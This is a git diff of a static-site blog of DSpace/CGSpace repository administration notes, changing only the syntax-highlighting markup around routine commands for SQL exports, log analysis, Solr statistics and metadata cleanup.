                                                                                                                                                                                                                                                                                                                                                                                                                                                        Read more → @@ -199,9 +199,9 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I experimented with manually sharding the Solr statistics on DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • First I exported all the 2019 stats from CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      Read more → @@ -223,15 +223,15 @@ $ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Export all affiliations on CGSpace and run them against the latest RoR data dump:
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • So we have 1879/7100 (26.46%) matching already
                                                                                                                                                                                                                                                                                                                                                                                                                                                        Read more → @@ -288,8 +288,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Update Docker images on AReS server (linode20) and reboot the server:
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                          Read more → @@ -313,9 +313,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          Read more → diff --git a/docs/categories/notes/index.xml b/docs/categories/notes/index.xml index f145f89c9..b6f224efe 100644 --- a/docs/categories/notes/index.xml +++ b/docs/categories/notes/index.xml @@ -17,11 +17,11 @@ <ul> <li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> @@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv & <li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> <li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p -Purging 1989 hits from The Knowledge AI in statistics -Purging 1235 hits from MaCoCu in statistics -Purging 455 hits from WhatsApp in statistics -<span style="color:#960050;background-color:#1e0010"> -</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> +</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> @@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics <li>I experimented with manually sharding the Solr statistics on DSpace Test</li> <li>First I exported all the 2019 stats from CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid -$ zstd statistics-2019.json -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> @@ -101,15 +101,15 @@ $ zstd statistics-2019.json <ul> <li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; -$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili -ations-matching.csv -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l -1879 -$ wc -l /tmp/2021-10-01-affiliations.txt -7100 /tmp/2021-10-01-affiliations.txt -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> <li>So we have 1879/7100 (26.46%) matching already</li> </ul> @@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Update Docker images on AReS server (linode20) and reboot the server:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> <li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> </ul> @@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; -COPY 20994 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> @@ -271,17 +271,17 @@ COPY 20994 <li>I had a call with CodeObia to discuss the work on OpenRXV</li> <li>Check the results of the AReS harvesting from last night:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> -{ - &#34;count&#34; : 100875, - &#34;_shards&#34; : { - &#34;total&#34; : 1, - &#34;successful&#34; : 1, - &#34;skipped&#34; : 0, - &#34;failed&#34; : 0 - } -} -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> @@ -599,17 +599,17 @@ COPY 20994 </ul> </li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 4671942 -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 1277694 </code></pre><ul> <li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> <li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; 1183456 -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot; +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; 106781 </code></pre> @@ -620,7 +620,7 @@ COPY 20994 Tue, 01 Oct 2019 13:20:51 +0300 https://alanorth.github.io/cgspace-notes/2019-10/ - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc. + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. @@ -634,7 +634,7 @@ COPY 20994 <li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> <li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -645,7 +645,7 @@ COPY 20994 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -761,16 +761,16 @@ DELETE 1 </ul> </li> </ul> -<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5 +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 4432 200 </code></pre><ul> <li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> <li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d </code></pre> @@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li> <li>The top IPs before, during, and after this latest alert tonight were:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 245 207.46.13.5 332 54.70.40.11 385 5.143.231.38 @@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> <li>There were just over 3 million accesses in the nginx logs last month:</li> </ul> -<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot; +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; 3018243 real 0m19.873s @@ -844,7 +844,7 @@ sys 0m1.979s <li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> <li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 92 40.77.167.4 99 210.7.29.100 120 38.126.157.45 @@ -979,7 +979,7 @@ sys 0m1.979s <li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> <li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n </code></pre><ul> <li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> <li>Time to index ~70,000 items on CGSpace:</li> @@ -1073,11 +1073,11 @@ sys 2m7.289s <li>I notice this error quite a few times in dspace.log:</li> </ul> <pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32. +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. </code></pre><ul> <li>And there are many of these errors every day for the past month:</li> </ul> -<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.* +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* dspace.log.2017-11-21:4 dspace.log.2017-11-22:1 dspace.log.2017-11-23:4 @@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34 <ul> <li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> </ul> -<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log 0 </code></pre><ul> <li>Generate list of authors on CGSpace for Peter to go through and correct:</li> </ul> -<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; COPY 54701 </code></pre> diff --git a/docs/categories/notes/page/2/index.html b/docs/categories/notes/page/2/index.html index 5bd668b10..ce4143c9a 100644 --- a/docs/categories/notes/page/2/index.html +++ b/docs/categories/notes/page/2/index.html @@ -10,14 +10,14 @@ - + - + @@ -206,17 +206,17 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I had a call with CodeObia to discuss the work on OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Check the results of the AReS harvesting from last night:
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -{
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -  }
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -}
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
